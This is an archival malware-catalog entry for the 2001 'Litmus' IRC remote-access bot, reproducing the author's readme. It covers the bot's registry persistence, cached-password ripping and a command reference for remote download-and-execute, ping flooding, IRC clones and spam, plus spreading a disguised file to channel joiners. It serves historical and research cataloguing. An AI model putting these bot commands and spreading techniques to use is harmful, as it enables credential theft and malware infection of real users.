Archive A Reconstructed © MegaSecurity Database
Litmus (c)
Released 24 years, 10 months ago. June 2001
Copyright © MegaSecurity
By The Litmus Group
Informations
| Author | The Litmus Group |
| Family | Litmus |
| Category | Remote Access |
| Version | Litmus (c) |
| Released Date | Jun 2001, 24 years, 10 months ago. |
| Language | Borland C, Source included |
Additional Information
Server:
c:\WINDOWS\litmus\mm.exe
size: 132.888 bytes
port: 9462, 113 TCP
startup:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "LTM2"
Does connect to an IRC server
Author Information / Description
Litmus 2.04
NEW: removes spaces from getusername(), which could have cause some bots to not connect =|
Litmus 2.03
NEW: passwords are encrypted ( really lame method though =\ )
-
NEW: .pwd Rips cached passwords on some machines >:)
-
NEW: Fixed so it works on NT now =)
Directions...
Run Config.exe you lazy asses... you could have hexed it with msdos editor
Bugs:
The damn things like to repeat shit
They also like to "Quit :ping timeout"
not sure what the deal is yet, but my other bots did this too
Commands:
.ident <password>
will idetify you as the master (note: you must have *lit* in your ident)
.download www.yahoo.com/files/runme.exe
will download the file from a site and put it in the home dir (C:\%windir%\litmus\ by default)
note: _dont_ use http://
.exec <file>
will run the file in the _HOME_ directory
.exec stow.exe will run C:\windows\litmus\stow.exe
.del <file>
will delete the specified using the specified path
.ping <host> <time>
will ping specified host for the time specified
you can stack these up ( .ping 208.47.125.33 60 .ping 208.47.125.33 60 )
.clones load <server> <port> <n>
loads n clones onto the irc server of your choice ( example .clones load irc.mcs.net 6667 3 )
you can have about ~40 clones max per host
.clones raw <commands>
all of the clones will send this info to the server
example: .clones raw PRIVMSG #dc4free :!list
.clones die
kills clones
.raw <command>
bot does this command
ex: .raw join #litmus2
.die
kills bot
------------------------------------------------------------------------------------------
New Commands / features:
The onjoin bot is supposed to reconnect when it disconnects,
but i havent fully _tested_ it
------>I _WOULDNT_ USE IT TO SPAM MESSAGES WITH IT WILL PROBABLY CRASH<------
Onjoin bot
.oj load <server> this will load up the bot onto any hybrid/bahamut irc server
ex: .oj load irc.dal.net
.oj msg <spammsg> this message will be noticed to anyone that joins a room the
onjoin bot is on
ex: .oj msg Visit: http://litmuscrew.org
.oj con <dothis> the onjoin bot will do this raw command when it connects
ex: .oj join #kampung,#mamak,#manila,#lima
.oj quit Kills the onjoin bot
.oj file <somefile> the bot will send this file to anyone who joins the room via the dcc server
ex: .oj file pub.exe
.oj me <nick> name your bot uses to dcc send your file (defaults to barbara)
ex: .oj me ChanServ
.oj nick <nick> changes the nick of your onjoin bot
ex .oj nick Guest58667
.oj stain <filename> This is the name your file is sent _AS_
ex .oj stain setup.exe
.oj join <chan> Joins the oj bot to a channe
ex .oj join #test
Buggy(?) commands:
.hub <port> opens up something like a minature irc for oj bots to .link with
.link <host> <port> if an onjoin bot is .linked with another hub, it will send the
names / hosts of people who join to the hub other bots will message the
person joining.... this all seems to be buggy(?) though
Online help (if compiled in)
.help
Notes:
This is a Demo... its got all kinds of crap in it, some of it which is for
debug (which isnt on by default). Its got some bugs too... maybe i will
fix them... The bots will op themselves on some servers (unreal sucks, they
wont do it there)
If your channel is full, +i, or the bot cant join for some reason it will join
#yourchannel1
The onjoin bot, and clones have a real shitty parser... they will pingout alot ill
fix this later.
"They Rally round your family With a pocket full of shells"
This archive is an almost-complete reconstruction of the legendary Mega Security (also known as Kobayashi), a premier 90s-era "Trojan Database" where malware authors once showcased their work. After a decade offline, the site was brought back in August 2024 by its original creator, MasterRat, who authorized the Malware Gallery to host this modernized, searchable version of the collection. While the original site remains available for those seeking a nostalgic, old-school experience, we are proud to continue its legacy here. Full credit and thanks go to MasterRat and the retired Mega Security staff for their years of dedicated work in cataloging these historical samples.